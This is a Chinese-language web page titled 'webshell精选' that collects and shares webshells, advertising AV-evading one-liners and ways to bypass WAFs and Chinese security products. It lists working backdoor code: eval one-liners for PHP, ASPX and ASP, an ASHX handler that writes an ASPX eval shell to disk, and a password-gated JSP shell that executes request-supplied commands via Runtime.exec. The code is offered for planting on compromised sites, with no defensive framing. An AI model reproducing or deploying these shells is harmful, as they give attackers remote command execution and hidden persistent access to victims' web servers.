<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<meta http-equiv="content-language" content="zh-cn">
	<meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no" />
	<meta name="renderer" content="webkit|ie-comp|ie-stand">
	<meta name="baidu-site-verification" content="BvCiLqUR7D" />
	<meta name="sogou_site_verification" content="Act9Ps01D1"/>
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<meta http-equiv="Cache-Control" content="no-siteapp" />
	<meta name="keywords" content="webshell精选,另类webshell,免杀一句话,过D盾,过waf,过安全狗,过云锁,隐蔽网站后门">
	<meta name="description" content="本站致力于WEBSHELL的精选、分享、交流。比如：免杀一句话,大马，隐蔽网站后门,小马，过D盾,过waf,过安全狗,过云锁等，以及最基本的webshell和另类webshell">
    <title>webshell精选</title>

</head>
<body><style>html,body,div,p{margin:0;padding:0}
         body{font-size:14px;font-family:"microsoft yahei";background-color:#ffffff}
         table{border-collapse:collapse;border-spacing:0;table-layout:fixed}
         th,td{font-size:12px;padding:0}
         a{text-decoration:none}
         img{border:0 none}
         .chead{width:734px}
         .chead .logo{width:434px;height:90px}
         .chead .txt{width:150px;height:90px}
         .blue{text-decoration:none;color:#3c3d5d}
         .column{width:734px;line-height:28px;border:1px solid #dedede}
         .column .hbox{width:125px;height:154px}
         .column .head{display:block;background-color:#fafafa}
         .column .box{width:100%;background-color:#ffffff;border-top:2px solid #f2f3f5}
         .column .box1{width:100%;word-wrap:break-word;color:#ffffff;background-color:#3f4160}
         .column .box2{width:100%;background-color:#f8f9fa}
         .column .tba{width:702px;padding:0 15px 15px}
         .column .tbb{width:702px;padding:0 15px}
         .column .tb1{width:682px;line-height:28px;color:#333333;word-break:break-all;padding:0 10px}
         .column .tb2{width:331px;padding:0 10px}
         .column .tb3{width:682px;padding:15px 10px 15px 0}
         .column .gray,.column .gray2{color:#999999;word-break:break-all}
         .column .gray2{color:#666666}
         .column .plate1,.column .plate2{width:342px;height:54px;font-size:16px;font-weight:bold;color:#818ba3}
         .column .plate1{width:682px;padding:0 25px}
         .column .plate1 .f16{font-size:14px;font-weight:normal;color:#333333}
         .column .plate1 .f12{font-size:12px;font-weight:normal;color:#999999}
         .column .keys,.column .keys2{width:85px;line-height:28px;color:#666666}
         .column .keys2{width:100px}
         .column .txt1,.column .txt2,.column .txt3{width:597px;line-height:28px;color:#333333;word-break:break-all}
         .column .txt2{width:246px}
         .column .txt3{font-size:14px;font-weight:bold}
         .column .txt4{width:240px;color:#ffffff;word-break:break-all}
         .column .infr{width:587px;color:#ffffff;table-layout:auto}
         .column .vam,.column .grcha{vertical-align:middle;margin-left:5px}
         .column .box1 .vam{margin-right:5px;margin-left:0}
         .column .name{font-size:24px;padding-bottom:18px}
         .column .icard{color:#a1a3ae;padding-bottom:18px}
         .column .con{border-top:1px dotted #ddd}
         .column .pr20{width:165px;padding-right:5px}
         .column .time{width:120px;line-height:28px;color:#666666;padding-left:10px}
         .column .rtbox{width:557px;line-height:28px;color:#333333;padding:0 10px 0 5px;word-break:break-all}
         .column .hai,.column .guan{line-height:18px;font-size:12px;color:#ffffff;vertical-align:text-top;margin-left:5px;padding:1px 3px;background-color:#3cbe7f;border-radius:2px}
         .column .guan{background-color:#ff9f20}
         .column .tag{display:inline-block;word-break:break-all;#display:inline;#zoom:1}
         .column .all{color:#666;padding:10px 10px;background-color:#fafafa}
         .column .tit{width:682px;height:40px;color:#666666;padding:0 10px;background-color:#f5f5f5}
         .column .p15{padding:15px 0}
         .column .p5{display:inline-block;color:#666666;padding:0 5px;#display:inline;#zoom:1}
         .column .cell .skill{width:120px;font-size:14px;font-weight:bold;text-align:right;padding-right:5px}
.column .cell .skbg,.column .cell .skco{display:inline-block;width:206px;height:18px;line-height:18px;font-size:12px;color:#ffffff;vertical-align:top;margin-top:6px;background-color:#dddddd;border-radius:20px;#display:inline;#zoom:1}
         .column .cell .skco{width:196px;font-style:normal;margin-top:0;padding-left:10px;background-color:#ff9f20;z-index:3}
         .column .sl .skco{width:147px}
         .column .lh .skco{width:98px}
         .column .yb .skco{width:49px}
         .column .fbox strong{font-size:14px;font-weight:bold}
         .column .cha{font-size:12px;font-weight:normal;color:#2d64b3;margin-left:5px}
         .column .cha:hover{color:#ff6000}
         .column .email{width:265px;color:#ffffff}

         .eng td,.eng .txt3,.eng .fbox strong{font-family:"Arial"}
         .eng .txt1,.eng .rtbox,.eng .phd{width:557px;font-family:"Arial";line-height:28px}
         .eng .txt2{width:206px}
         .eng .txt4{width:145px}
         .eng .cell .txt3{width:120px}
         .eng .keys{width:110px;text-align:right;padding-right:15px}
         .eng .pr20 .keys{width:50px}
         .eng .keys2{width:80px}
         .eng .phd{padding-left:135px}
         .eng .time{width:110px;text-align:right;padding-right:10px}
         .eng .email{width:170px} </style>

<table cellpadding="0" cellspacing="0" align="center" bgcolor="#fff" class="column"><tbody><tr><td valign="top">
<table xmlns="" cellspacing="0" cellpadding="0" border="0" class="box1"><tbody><tr>
<td class="hbox" align="middle"> </td>
<td><table cellspacing="0" cellpadding="0" border="0" class="infr"><tbody>
<tr>
<td colspan="2" class="name">webshell</td>
</tr>
<tr>
<td valign="top">
<table cellspacing="0" cellpadding="0" border="0" class="email">
<tbody>
免杀一句话&nbsp;&nbsp;
<tr>
webshell精选&nbsp;&nbsp;
</tr>
<tr>
隐蔽网站后门&nbsp;&nbsp;
</tr>
<tr>
另类webshell&nbsp;&nbsp;
</tr>
<tr>
基本webshell
</tr>
<tr>
<span style=".divcss5_italic;padding:5px 10px;overflow:hidden;font-weight:bold;color:#ff9955;font-size:24px;color:#FFB90F;">
<a style="color:#FFB90F" target="_blank" href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=laimooc@163.com">留言</a>
</span>

</tr>


</tbody>
</table>
</td>
</tr>

</tbody></table></td>
</tr></tbody></table>

<table xmlns="" cellspacing="0" cellpadding="0" border="0" class="box2"><tbody><tr><td class="tba"><table cellspacing="0" cellpadding="0" border="0"><tbody><tr>
<td valign="top" class="tb2"><table cellspacing="0" cellpadding="0" border="0">
<thead style="height:0"><tr>
<td valign="top" class="keys"></td>
<td valign="top" class="txt2"></td>
</tr></thead>
<tbody>
<tr><td colspan="2" class="plate2">基本webshell</td></tr>
<tr>
<td valign="top" class="keys">PHP：</td>
<td valign="top" class="txt2">&lt;?php&#x20;eval($_POST[c]);?&gt;</td>
</tr>
<tr>
<td valign="top" class="keys">ASPX：</td>
<td valign="top" class="txt1">&lt;%@&#x20;Page&#x20;Language=&quot;Jscript&quot;%&gt;&lt;%eval(Request.Item[&quot;pass&quot;],&quot;unsafe&quot;);%&gt;</td>

</tr>

</tbody>
</table></td>
<td valign="top" class="tb2"><table cellspacing="0" cellpadding="0" border="0">
<thead style="height:0"><tr>
<td valign="top" class="keys"></td>
<td valign="top" class="txt2"></td>
</tr></thead>
<tbody>
<tr><td colspan="2" class="plate2"></td></tr>
<tr>
<td valign="top" class="keys">ASP：</td>
<td valign="top" class="txt1"><%eval request("sb")%></td>

</tr>

</tbody>
</table></td>
</tr></tbody></table></td></tr></tbody></table>


<table xmlns="" cellspacing="0" cellpadding="0" border="0" class="box"><tbody>
<tr><td class="tbb"><table cellspacing="0" cellpadding="0" border="0"><tbody>
<tr><td class="tit">其他WEBSHELL</td></tr>
<tr><td class="p15"><table cellspacing="0" cellpadding="0" border="0"><tbody><tr><td class="tb1"><table cellspacing="0" cellpadding="0" border="0"><tbody>
<tr>
<td valign="top" class="keys">ASHX：</td>
<td valign="top" class="txt1"><p>
<%@ WebHandler Language="C#" Class="Handler" %> <br/>
using System; <br/>
using System.Web; <br/>
using System.IO; <br/>
	public class Handler : IHttpHandler { <br/>
     
    public void ProcessRequest (HttpContext context) { 
        context.Response.ContentType = "text/plain"; <br/>
        string show="&lt;% @Page Language=\"Jscript\"%"+"><%eval(Request.Item"+"[\"pass\"]"+",\"unsafe\");%>"; <br/>
        StreamWriter file1= File.CreateText(context.Server.MapPath("root.aspx")); <br/>
        file1.Write(show); <br/>
        file1.Flush(); <br/>
        file1.Close(); <br/>
    } 
 <br/>
    public bool IsReusable { <br/>
        get { <br/>
            return false; <br/>
        } <br/>
    } <br/>
} <br/>
</p>
</td>
</tr>
<tr>
<td valign="top" class="keys">JSP：</td>
<td valign="top" class="txt1">

<%
    if("023".equals(request.getParameter("pwd"))){<br/>
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();<br/>
        int a = -1;<br/>
        byte[] b = new byte[2048];<br/>
        out.print("&lt;pre>");<br/>
        while((a=in.read(b))!=-1){<br/>
            out.println(new String(b,0,a));<br/>
        }<br/>
        out.print("&lt;/pre>");<br/>
    }
%><br/>参考链接：
http://javaweb.org/?p=1627，

</td>
</tr>

<tr>
<td valign="top" class="keys">JSPX：</td>
<td valign="top" class="txt1">
该类型脚本研究不太深刻,如有需要,
<a target="_blank" href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=laimooc@163.com" style="text-decoration:none;">Please给我写信</a>
</td>
</tr>
</tbody></table></td></tr></tbody></table></td></tr>
</tbody></table></td></tr>
</tbody></table>




<table xmlns="" cellspacing="0" cellpadding="0" border="0" class="box"><tbody>
<tr><td class="plate1">更新中</td></tr>
<tr><td class="tbb"><table cellspacing="0" cellpadding="0" border="0"><tbody>
<tr><td class="tit"></td></tr>
<tr><td class="p15"><table cellspacing="0" cellpadding="0" border="0"><tbody><tr><td class="tb1"><table cellspacing="0" cellpadding="0" border="0"><tbody>
</tbody></table></td></tr></tbody></table></td></tr>
</tbody></table></td></tr>
</tbody></table>
</td></tr></tbody></table><a href="http://ahcert.org.cn"></a>
<p style="display:none;">
<script language="javascript" type="text/javascript" src="http://js.users.51.la/19110253.js"></script></p>
</body></html>
